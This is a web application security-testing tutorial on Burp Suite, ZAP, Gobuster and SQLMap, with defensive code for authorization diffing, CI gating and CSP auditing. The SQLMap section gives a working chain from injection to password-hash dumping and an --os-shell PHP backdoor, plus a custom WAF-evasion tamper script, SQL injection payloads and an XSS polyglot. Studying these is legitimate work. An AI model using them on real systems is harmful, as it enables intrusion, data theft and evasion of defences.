Web Application Testing with Specialized Toolkits

Mapping the Attack Surface: Reconnaissance and Content Discovery

Before injecting payloads or manipulating sessions, effective web application testing demands systematic reconnaissance. The OWASP Testing Guide v4 structures this across information gathering, configuration management, and identity management—phases where specialized tools prove indispensable.

Gobuster and dirb remain foundational for content discovery, each optimized for distinct scenarios. Gobuster leverages Go's concurrency model to achieve substantially higher throughput:

# Directory enumeration with wordlist and extensions
gobuster dir -u https://target.example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,aspx,html,bak,txt -t 50

# Virtual host discovery for shared hosting environments
# (--append-domain turns each wordlist entry into <word>.target.example.com)
gobuster vhost -u https://target.example.com -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --append-domain

Use -k to skip certificate validation against internal hosts with self-signed certificates. Gobuster probes a random path first and aborts when the server answers every request the same way; --wildcard forces it to continue, and the catch-all responses are then filtered out with --exclude-length or by blacklisting the catch-all status code with -b. For APIs and JavaScript-heavy applications, combine with ffuf to fuzz parameters and routes recovered from source maps.

Dirb fills a different niche: it recurses into every directory it finds by default (Gobuster does not recurse), and its -c flag sets a cookie header so enumeration continues behind a login. Gobuster offers the same cookie support with -c, so the practical difference is recursion and speed, not session handling.

Intercepting and Manipulating Traffic: The Burp Suite Professional Workflow

Burp Suite Professional serves as the central nervous system of web application testing, with four tools forming the core workflow: Spider (in Burp 2.x the crawler that lives inside Scanner), Scanner, Intruder, and Repeater.

Spider systematically crawls applications, mapping attack surface by following links, submitting forms, and parsing JavaScript. Modern applications require configured login macros—recorded sequences that handle anti-CSRF tokens, CAPTCHA challenges, or multi-step authentication. Configure these under Project Options → Sessions → Macros, then bind to specific URL scope for continuous authenticated crawling.

Scanner provides both passive and active analysis. Passive scanning analyzes all proxy traffic without additional requests, identifying cleartext password fields, missing security headers, and information disclosure in responses. Active scanning sends tailored payloads, but requires discretion:

  • Light active scan: Header manipulation, basic payload insertion
  • Medium active scan: Time-based detection, nested encoding
  • Intrusive active scan: File path manipulation, out-of-band interaction (requires Burp Collaborator)

Intruder enables customized automated attacks through four attack types, each distributing payloads across the marked positions differently. Sniper uses one payload set and targets each position in turn; Battering ram puts the same payload into every position at once; Pitchfork walks several payload sets in parallel (one list per position, ideal for credential stuffing); Cluster bomb tries every combination of the sets for exhaustive brute force.

Repeater facilitates manual refinement—tweaking individual requests, observing nuanced responses, and building proof-of-concept exploits. The Render tab visualizes HTML responses, while the Hex editor manipulates binary payloads for deserialization attacks.

Burp's extensibility transforms it from scanner to comprehensive testing platform. Critical extensions include:

Extension        Function                                                           Installation
Autorize         Automated authorization and privilege-escalation testing           BApp Store
Logger++         Forensic-grade request/response logging with advanced filtering    BApp Store
Turbo Intruder   High-performance HTTP attacks scripted in Python                   BApp Store
Param Miner      Hidden parameter and header discovery by response diffing          BApp Store

Autorize works by replaying every request the proxy sees under a different session: it swaps in the session header of a low-privileged user (pasted into its configuration, e.g. Cookie: session=<low-priv token>) and, if "Check unauthenticated" is enabled, also resends the request with no session at all, then compares both responses with the original. Browse the application as the high-privileged user and Autorize marks each endpoint Bypassed!, Enforced!, or Is enforced??? (same status but a different body, which needs an enforcement-detector rule to classify). Endpoints that return identical content across privilege levels surface missing authorization checks and IDORs immediately.
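The comparison Autorize performs, written out as an added example (this is not Autorize's code). The target is a constructed in-memory stand-in for a web application with one correctly protected endpoint, one IDOR-style endpoint, one that returns per-user data, and one with no check at all; swap fake_target for a real HTTP client with the same (path, cookie) to (status, body) contract to run it over a proxy capture. The cookie values and paths are assumptions for the demo.

```python
"""Autorize-style authorization diffing (added example, not Autorize's own code).

Each request captured from the high-privilege session is replayed twice: once
with the low-privilege cookie, once with no cookie, and the responses compared.
"""
from typing import Callable, Dict, Optional, Tuple

Response = Tuple[int, bytes]

# Constructed credentials for the two test identities.
ADMIN_COOKIE = "session=admin-token"
LOW_PRIV_COOKIE = "session=alice-token"


def fake_target(path: str, cookie: Optional[str]) -> Response:
    """Constructed target: returns (status, body) the way a real app would."""
    if path.startswith("/admin/"):
        allowed = cookie == ADMIN_COOKIE            # correct: role enforced
    elif path == "/api/profile":
        if cookie is None:
            return 403, b'{"error":"forbidden"}'
        return 200, b'{"profile":"%s"}' % cookie.encode()  # per-user data: legitimately differs
    elif path.startswith("/api/users/"):
        allowed = cookie is not None                # flawed: any session reads any user
    else:
        allowed = True                              # flawed: no check at all
    if allowed:
        return 200, b'{"data":"resource %s"}' % path.encode()
    return 403, b'{"error":"forbidden"}'


def verdict(original: Response, replayed: Response,
            enforcement_marker: bytes = b'"error":"forbidden"') -> str:
    """Autorize's three states, reproduced here:
    Enforced!       status changed, or the configured enforcement-detector text appeared
    Bypassed!       identical status and body
    Is enforced???  same status but a different body; needs a better detector rule"""
    if replayed[0] != original[0] or enforcement_marker in replayed[1]:
        return "Enforced!"
    if replayed[1] == original[1]:
        return "Bypassed!"
    return "Is enforced???"


def authz_diff(fetch: Callable[[str, Optional[str]], Response], paths,
               high_cookie: str = ADMIN_COOKIE,
               low_cookie: str = LOW_PRIV_COOKIE) -> Dict[str, Dict[str, str]]:
    """Replay each captured high-privilege request as the low-privileged user
    and with no session, and classify each result."""
    results = {}
    for path in paths:
        original = fetch(path, high_cookie)
        results[path] = {
            "low_priv": verdict(original, fetch(path, low_cookie)),
            "unauth": verdict(original, fetch(path, None)),
        }
    return results


def demo() -> Dict[str, Dict[str, str]]:
    return authz_diff(fake_target, ["/admin/users", "/api/users/42", "/api/profile", "/api/keys"])


if __name__ == "__main__":
    for path, r in demo().items():
        print(f"{path:16} low-priv: {r['low_priv']:15} unauth: {r['unauth']}")
```

The /api/profile row is the reason the third state exists: the body differs because each user sees their own data, not because access control failed, and only a detector rule (here the forbidden marker) or a human can tell those apart.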

Logger++ supersedes Burp's native logging with filter expressions, JSON/CSV export, and an Elasticsearch exporter. For forensic reconstruction of complex multi-step attacks, a filter such as Request.Method == "POST" && Response.Status == 302 isolates exactly the requests of interest.

Automated Vulnerability Detection: OWASP ZAP in Pipeline Context

OWASP ZAP complements Burp with strong automation and CI/CD integration. Its Ajax Spider drives a real browser to execute JavaScript, so it reaches single-page-application routes that traditional crawlers, which only parse HTML, never see.

For pipeline integration, ZAP's packaged scans execute via Docker:

# Baseline scan: spider plus passive rules only, non-intrusive.
# /zap/wrk must be mounted, otherwise the report is lost and the hook file is not found.
docker run -v $(pwd):/zap/wrk/:rw -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \
  -t https://target.example.com \
  -r zap-report.html \
  --hook=/zap/wrk/custom-hooks.py

# Full scan: spider plus active rules.
# -g writes the default rule configuration to gen.conf; edit it and pass it back with -c.
docker run -v $(pwd):/zap/wrk/:rw -t ghcr.io/zaproxy/zaproxy:stable zap-full-scan.py \
  -t https://target.example.com \
  -g gen.conf \
  -x zap-report.xml

The Automation Framework (YAML-based) enables version-controlled scan configurations:

env:
  contexts:
    - name: "Target Context"
      urls:
        - "https://api.target.example.com"
      authentication:
        method: "json"
        parameters:
          loginRequestUrl: "https://api.target.example.com/auth/login"
          loginRequestBody: '{"username":"{%username%}","password":"{%password%}"}'
      users:
        - name: "scan-user"
          credentials:
            username: "scan-user"           # placeholder: inject real values from CI secrets
            password: "scan-user-password"
jobs:
  - type: spider
    parameters:
      context: "Target Context"
      user: "scan-user"
      maxDepth: 5
  - type: activeScan
    parameters:
      context: "Target Context"
      user: "scan-user"
      policy: "API-Minimal"
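A pipeline needs a decision, not just a report, and the scan scripts' exit code alone does not express "fail on High with at least medium confidence, warn on the rest". The gate below is an added example, not part of ZAP or its scripts. The report excerpt and the rules text are constructed by hand; the report follows ZAP's traditional JSON layout (site[].alerts[] with string-valued riskcode and confidence, written with -J), and the rules mirror the tab-separated pluginid / IGNORE|WARN|FAIL lines the scripts read through -c.

```python
"""Gate a CI job on a ZAP JSON report (added example, not ZAP's own code)."""
import json
from typing import Dict, List, Tuple

# Constructed excerpt of a report written by zap-baseline.py -J report.json.
SAMPLE_REPORT = json.loads("""
{ "@programName": "ZAP", "@version": "2.14.0",
  "site": [ { "@name": "https://target.example.com", "alerts": [
    { "pluginid": "10038", "riskcode": "2", "confidence": "3",
      "name": "Content Security Policy (CSP) Header Not Set",
      "instances": [ { "uri": "https://target.example.com/", "method": "GET" } ] },
    { "pluginid": "40012", "riskcode": "3", "confidence": "2",
      "name": "Cross Site Scripting (Reflected)",
      "instances": [ { "uri": "https://target.example.com/search?q=x", "method": "GET", "param": "q" } ] },
    { "pluginid": "10021", "riskcode": "1", "confidence": "2",
      "name": "X-Content-Type-Options Header Missing",
      "instances": [ { "uri": "https://target.example.com/", "method": "GET" } ] }
  ] } ] }
""")

# Constructed rules file in the layout the scan scripts accept via -c.
SAMPLE_RULES = (
    "# pluginid<TAB>action<TAB>(name)\n"
    "10021\tIGNORE\t(X-Content-Type-Options Header Missing)\n"
    "10038\tWARN\t(Content Security Policy (CSP) Header Not Set)\n"
)

RISK_NAMES = {"0": "informational", "1": "low", "2": "medium", "3": "high"}


def parse_rules(text: str) -> Dict[str, str]:
    """Map plugin id -> IGNORE/WARN/FAIL; blank lines and # comments are skipped."""
    rules = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        plugin_id, action = line.split("\t")[:2]
        rules[plugin_id] = action.strip().upper()
    return rules


def gate(report: dict, rules: Dict[str, str], fail_from: str = "medium",
         min_confidence: int = 2) -> Tuple[List[dict], List[dict]]:
    """Split alerts into (failures, warnings).

    An alert fails the build when its rule says FAIL, or when no rule overrides it and
    it is at least `fail_from` risk with at least `min_confidence` (2 = medium), so a
    low-confidence High does not break the pipeline but still shows up as a warning."""
    threshold = {name: int(code) for code, name in RISK_NAMES.items()}[fail_from]
    failures, warnings = [], []
    for site in report.get("site", []):
        for alert in site.get("alerts", []):
            action = rules.get(alert["pluginid"], "")
            if action == "IGNORE":
                continue
            entry = {
                "pluginid": alert["pluginid"],
                "name": alert["name"],
                "risk": RISK_NAMES.get(alert["riskcode"], alert["riskcode"]),
                "urls": sorted({i["uri"] for i in alert.get("instances", [])}),
            }
            severe = (int(alert["riskcode"]) >= threshold
                      and int(alert["confidence"]) >= min_confidence)
            if action == "FAIL" or (action != "WARN" and severe):
                failures.append(entry)
            else:
                warnings.append(entry)
    return failures, warnings


def main() -> int:
    failures, warnings = gate(SAMPLE_REPORT, parse_rules(SAMPLE_RULES))
    for w in warnings:
        print(f"WARN {w['pluginid']} {w['risk']:13} {w['name']}")
    for f in failures:
        print(f"FAIL {f['pluginid']} {f['risk']:13} {f['name']} -> {', '.join(f['urls'])}")
    return 1 if failures else 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Keep the rules file in the repository next to the Automation Framework YAML so that every suppression is reviewed like code; an IGNORE without a reason in the (name) column is the first thing to look for in review.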

ZAP's scripting engine accepts JavaScript, Python (Jython), Groovy, Zest and others for custom active and passive scan rules. The OAST (Out-of-band Application Security Testing) add-on registers callback endpoints with an interactsh or BOAST server (or ZAP's own callback service) so that blind vulnerabilities can be detected: SSRF, blind XSS, and command injection where nothing in the immediate response indicates success.

Database Compromise: SQLMap Detection and Evasion

SQLMap remains the definitive tool for SQL injection automation, but effective deployment requires understanding its detection hierarchy and evasion mechanisms.

Detection breadth is controlled by --level (1-5, default 1) and payload aggressiveness by --risk (1-3, default 1). Each level adds more payloads and boundary variants for every technique, and the set of injection points grows with it:

  • Level 1: GET/POST parameters, using every technique (boolean-blind, error-based, UNION, stacked, time-based)
  • Level 2: adds HTTP Cookie values
  • Level 3: adds the User-Agent and Referer headers
  • Level 4: more payloads and boundaries per technique, no new injection points
  • Level 5: adds the Host header

Risk 1 is the safe default; risk 2 adds heavy-query time-based tests; risk 3 adds OR-based boolean-blind payloads, which can modify data if the injection lands inside an UPDATE or DELETE statement. Neither setting issues DROP or ALTER statements on its own or attempts an OS shell; those come only from explicit switches such as --os-shell or --sql-query.

Worked Example: Login Portal to OS Shell

Consider a login portal at https://legacy.target.example.com/login.php with parameters username and password. Initial reconnaissance reveals MySQL error messages on malformed input.

Phase 1: Error-based Detection

sqlmap -u "https://legacy.target.example.com/login.php" \
  --data="username=test&password=test" \
  --level=2 --risk=1 \
  --batch

Expected output identifies the injection point:

Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: username=test' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71767a7671,(SELECT (ELT(2153=2153,1))),0x71767a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'jSLE'='jSLE&password=test

Phase 2: Database Fingerprinting and Enumeration

sqlmap -u "https://legacy.target.example.com/login.php" \
  --data="username=test&password=test" \
  --banner --current-user --current-db \
  --dbs --tables -D application_db

Output confirms MySQL 5.7.38, user app_user@localhost, database application_db, and reveals tables including users, sessions, api_keys.

Phase 3: UNION-based Data Extraction

sqlmap -u "https://legacy.target.example.com/login.php" \
  --data="username=test&password=test" \
  -D application_db -T users -C username,password_hash,email \
  --dump --threads=4

SQLMap uses the fastest technique it has confirmed: if a UNION-based injection is available it works out the column count and compatible data types itself, otherwise it falls back to error-based or blind extraction. Hashes it recognises in the dump (here password_hash) are offered for cracking with its built-in dictionary attack, which --batch accepts by default.

Phase 4: os-shell Access

sqlmap -u "https://legacy.target.example.com/login.php" \
  --data="username=test&password=test" \
  --os-shell

On MySQL this needs the FILE privilege for the database user, a secure_file_priv setting that permits writing into a directory the web server serves, and a known or guessable webroot path. SQLMap uses a UNION or stacked injection to write a small file stager there with INTO OUTFILE (the same mechanism behind --file-write), uploads a PHP backdoor through the stager, and then drives the backdoor for interactive command execution. SQLMap reports when the stager cannot be written, so check the FILE privilege with --privileges before trying.

Manual work beats the tool in several situations: boolean-based blind injection where the true/false signal is non-standard, NoSQL injection (MongoDB, CouchDB), which SQLMap does not cover, second-order injection beyond what --second-url can model (payload stored by one request, triggered by another), and Oracle exploitation where restricted UTL_FILE permissions block the file-based techniques.
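The server-side bug behind the worked example, in miniature, as an added example (this is not the page's target application). A throw-away SQLite database stands in for MySQL, so the MySQL-specific error-based payload cannot be reproduced, but the payload classes behave the same way: a stray quote triggers the database error that error-based detection keys on, a comment terminator bypasses the password check, and a true/false pair gives the boolean-blind signal that sqlmap measures. The parameterized version answers every payload with "no such user". Table contents and passwords are constructed.

```python
"""Vulnerable and hardened login queries side by side (added example)."""
import hashlib
import sqlite3
from typing import Optional


def hash_password(password: str) -> str:
    # Stand-in so the table has a password_hash column like the worked example;
    # production code wants a salted, slow KDF, not a bare digest.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed users table with one privileged row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", hash_password("s3cret-admin-pw"), "admin@legacy.target.example.com"),
        ("alice", hash_password("alice-pw"), "alice@legacy.target.example.com"),
    ])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """login.php as sqlmap sees it: user input concatenated into the query and database
    errors echoed back, which is what makes error-based detection work."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
           % (username, hash_password(password)))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as err:
        return "error: " + str(err)          # verbose failure leaks to the client
    return row[0] if row else None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same query with bound parameters: input can never change the statement shape."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, hash_password(password)),
    ).fetchone()
    return row[0] if row else None


# The same payload classes sqlmap sends, reduced to one representative each.
PAYLOADS = {
    "error-based probe": "test'",
    "auth bypass": "admin' -- ",
    "boolean-blind TRUE": "admin' AND '1'='1' -- ",
    "boolean-blind FALSE": "admin' AND '1'='2' -- ",
}


def compare(conn: sqlite3.Connection) -> dict:
    """Run every payload through both implementations; returns {label: (vulnerable, hardened)}."""
    return {label: (login_vulnerable(conn, p, "wrong"), login_hardened(conn, p, "wrong"))
            for label, p in PAYLOADS.items()}


if __name__ == "__main__":
    for label, (vuln, hard) in compare(make_db()).items():
        print(f"{label:20} vulnerable={vuln!r:45} hardened={hard!r}")
```

The TRUE/FALSE pair is the whole basis of blind extraction: once a single condition can be steered between two distinguishable responses, any value in the database can be read one bit at a time, which is what sqlmap automates when no error or UNION channel is available.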

WAF Evasion and Tamper Scripts

Modern defenses—Cloudflare, Akamai, AWS WAF, and custom rule sets—necessitate tamper script composition. SQLMap's --tamper option chains multiple scripts:

sqlmap -u "https://protected.target.example.com/api/search" \
  --data="query=test" \
  --tamper=space2comment,between,charencode \
  --random-agent --delay=2 --time-sec=5 \
  --level=3 --risk=2

Effective tamper combinations by target (starting points only; confirm each against the live rule set):

WAF/Defense   Tamper strategy                            Scripts
Cloudflare    Character encoding, case randomization     charencode, randomcase, space2comment
Akamai        Whitespace variation, encoding             multiplespaces, base64encode
AWS WAF       SQL keyword fragmentation                  between, greatest, space2morehash (MySQL only)
ModSecurity   Versioned comments, null-byte tricks       modsecurityversioned, modsecurityzeroversioned, apostrophenullencode

For custom WAFs, identify blocking behavior through systematic fuzzing: send baseline requests, iterate payload components, and analyze 403/406/500 response patterns. Build bespoke tampers when generic scripts fail.
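What a bespoke tamper looks like, as an added example (this is not one of sqlmap's bundled scripts). It assumes the fuzzing step showed that the WAF matches a fixed list of SQL keywords and plain whitespace: each keyword is wrapped in a MySQL versioned comment (/*!50000SELECT*/), which MySQL still executes, and every space is replaced by a rotating whitespace substitute so that no two gaps share a signature. The keyword list is an assumption; PRIORITY, singleTimeWarnMessage, dependencies() and tamper(payload, **kwargs) are sqlmap's real tamper API. The bundled versionedkeywords and space2comment scripts each do part of this; the point is one script tuned to one rule set.

```python
#!/usr/bin/env python
"""
Bespoke sqlmap tamper script (added example). Save as tamper/versioned_space.py
inside the sqlmap tree and select it with --tamper=versioned_space.
"""
import re

try:
    from lib.core.enums import PRIORITY              # sqlmap's real tamper API
    from lib.core.common import singleTimeWarnMessage
except ImportError:                                  # lets the file run outside sqlmap
    class PRIORITY:
        NORMAL = 0

    def singleTimeWarnMessage(message):
        print(message)

__priority__ = PRIORITY.NORMAL

# Assumed block list learned from the fuzzing step; add whatever the WAF actually rejects.
BLOCKED_KEYWORDS = ("SELECT", "UNION", "FROM", "WHERE", "AND", "OR",
                    "ORDER", "GROUP", "HAVING", "LIMIT", "INTO", "OUTFILE")
KEYWORD_RE = re.compile(r"\b(%s)\b" % "|".join(BLOCKED_KEYWORDS), re.IGNORECASE)

# Whitespace substitutes MySQL accepts between tokens; %0a and %09 arrive URL-encoded.
SPACE_SUBSTITUTES = ("/**/", "%0a", "%09")


def dependencies():
    singleTimeWarnMessage("tamper script 'versioned_space' only makes sense against MySQL")


def tamper(payload, **kwargs):
    """
    Called by sqlmap once per payload; kwargs carries the request headers, which a
    tamper may also modify. Returns the rewritten payload.

    >>> tamper("1 AND 1=1 UNION SELECT NULL FROM users")
    '1/**//*!50000AND*/%0a1=1%09/*!50000UNION*//**//*!50000SELECT*/%0aNULL%09/*!50000FROM*//**/users'
    """
    if not payload:
        return payload
    wrapped = KEYWORD_RE.sub(lambda m: "/*!50000%s*/" % m.group(1).upper(), payload)
    parts = wrapped.split(" ")
    out = []
    for i, part in enumerate(parts):
        out.append(part)
        if i < len(parts) - 1:                       # one substitute per original space
            out.append(SPACE_SUBSTITUTES[i % len(SPACE_SUBSTITUTES)])
    return "".join(out)
```

Like the bundled scripts it does not parse string literals, so a keyword that happens to appear as a whole word inside a quoted marker would be rewritten too; the word-boundary anchors keep it from touching identifiers such as ordering or password. Verify the rewritten payload against a local MySQL before trusting it against the target, since versioned comments are a MySQL-only construct.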

Client-Side Attack Surface: XSS, CSRF, and DOM Manipulation

Client-side testing addresses the remaining OWASP categories. Reflected XSS validates through immediate payload reflection; Stored XSS requires multi-step verification across user sessions; DOM-based XSS demands JavaScript execution flow analysis.

Burp's DOM Invader, built into the Burp browser rather than installed as an extension, injects a canary value and traces it from sources to sinks automatically. For manual verification:

// Standard polyglot for context detection
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

CSRF testing validates token entropy, SameSite cookie enforcement, and cross-origin submission viability. Burp's CSRF PoC generator (right-click request → Engagement Tools → Generate CSRF PoC) produces proof-of-concept HTML. For applications employing double-submit cookies, verify synchronization between cookie and parameter tokens.

Modern frameworks implement Content Security Policy (CSP) and Trusted Types as mitigation layers. Bypass assessment starts with the script-src directive: 'unsafe-inline' without nonces or hashes leaves XSS unmitigated; 'unsafe-eval' combined with an allowed host that serves a gadget library (the classic case is an AngularJS build on a permitted CDN) gives code execution through template expressions; and 'strict-dynamic' propagates trust from a nonced script to every script it creates, so a loader that builds script elements from attacker-influenced data, such as markup injected into a JSON response, becomes a bypass. Check also that base-uri and object-src are set, since neither is covered by a script-src nonce.
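A static CSP check that applies the points above to a policy header, as an added example (not Burp's or any framework's code): whether script execution is governed at all, whether 'unsafe-inline' survives (nonces or hashes make browsers ignore it), whether 'unsafe-eval' sits next to allowed hosts that may carry gadget libraries, whether 'strict-dynamic' has a nonce to work with, whether wildcards or data: are accepted, and whether base-uri and object-src are set. The sample policies are constructed.

```python
"""Static audit of a Content-Security-Policy header (added example)."""
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (short code, explanation)


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Directive name -> source list. Names and keywords are ASCII case-insensitive,
    and the first occurrence of a directive wins, as in browsers."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), [t.lower() for t in tokens[1:]])
    return policy


def audit_csp(header: str) -> List[Finding]:
    policy = parse_csp(header)
    findings: List[Finding] = []
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return [("no-script-policy", "neither script-src nor default-src is set; any script runs")]
    nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in sources)
    if "'unsafe-inline'" in sources and not nonce_or_hash:
        findings.append(("unsafe-inline",
                         "inline scripts and event handlers execute; reflected and stored XSS are not mitigated"))
    if "'unsafe-eval'" in sources:
        hosts = [s for s in sources if not s.startswith("'")]
        findings.append(("unsafe-eval",
                         "eval()/Function() allowed; check allowed hosts %s for gadget libraries such as AngularJS"
                         % (hosts or ["(none)"])))
    if "'strict-dynamic'" in sources:
        if nonce_or_hash:
            findings.append(("strict-dynamic-gadget-surface",
                             "nonced scripts may create further scripts; audit loaders that build script "
                             "elements from attacker-influenced data"))
        else:
            findings.append(("strict-dynamic-without-nonce",
                             "'strict-dynamic' does nothing without a nonce or hash source"))
    for s in sources:
        if s in ("*", "http:", "https:"):
            findings.append(("wildcard-source", "script-src allows %s, so any matching host can serve scripts" % s))
        elif s == "data:":
            findings.append(("data-scheme", "data: URIs may be used as script sources"))
    if "object-src" not in policy and "default-src" not in policy:
        findings.append(("missing-object-src", "no object-src and no default-src fallback; plugin content is unrestricted"))
    if "base-uri" not in policy:
        findings.append(("missing-base-uri",
                         "base-uri never falls back to default-src; an injected <base> redirects relative script URLs"))
    return findings


def codes(header: str) -> List[str]:
    return [code for code, _ in audit_csp(header)]


# Constructed sample policies.
WEAK_POLICY = ("default-src 'self'; "
               "script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ajax.googleapis.com")
NONCE_POLICY = "script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'"
WILDCARD_POLICY = "script-src * data:"

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("nonce", NONCE_POLICY), ("wildcard", WILDCARD_POLICY)):
        print(name)
        for code, detail in audit_csp(policy):
            print(f"  [{code}] {detail}")
```

A clean result from this check is a starting point, not a verdict: the nonce policy passes every static test here, and whether it actually holds depends on the loaders and JSONP-style endpoints that the page's own scripts expose, which only a manual review of the allowed scripts can settle.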

The comprehensive tester alternates between automated scanning for coverage and manual manipulation for depth—recognizing that tool output represents hypotheses requiring validation, never conclusions.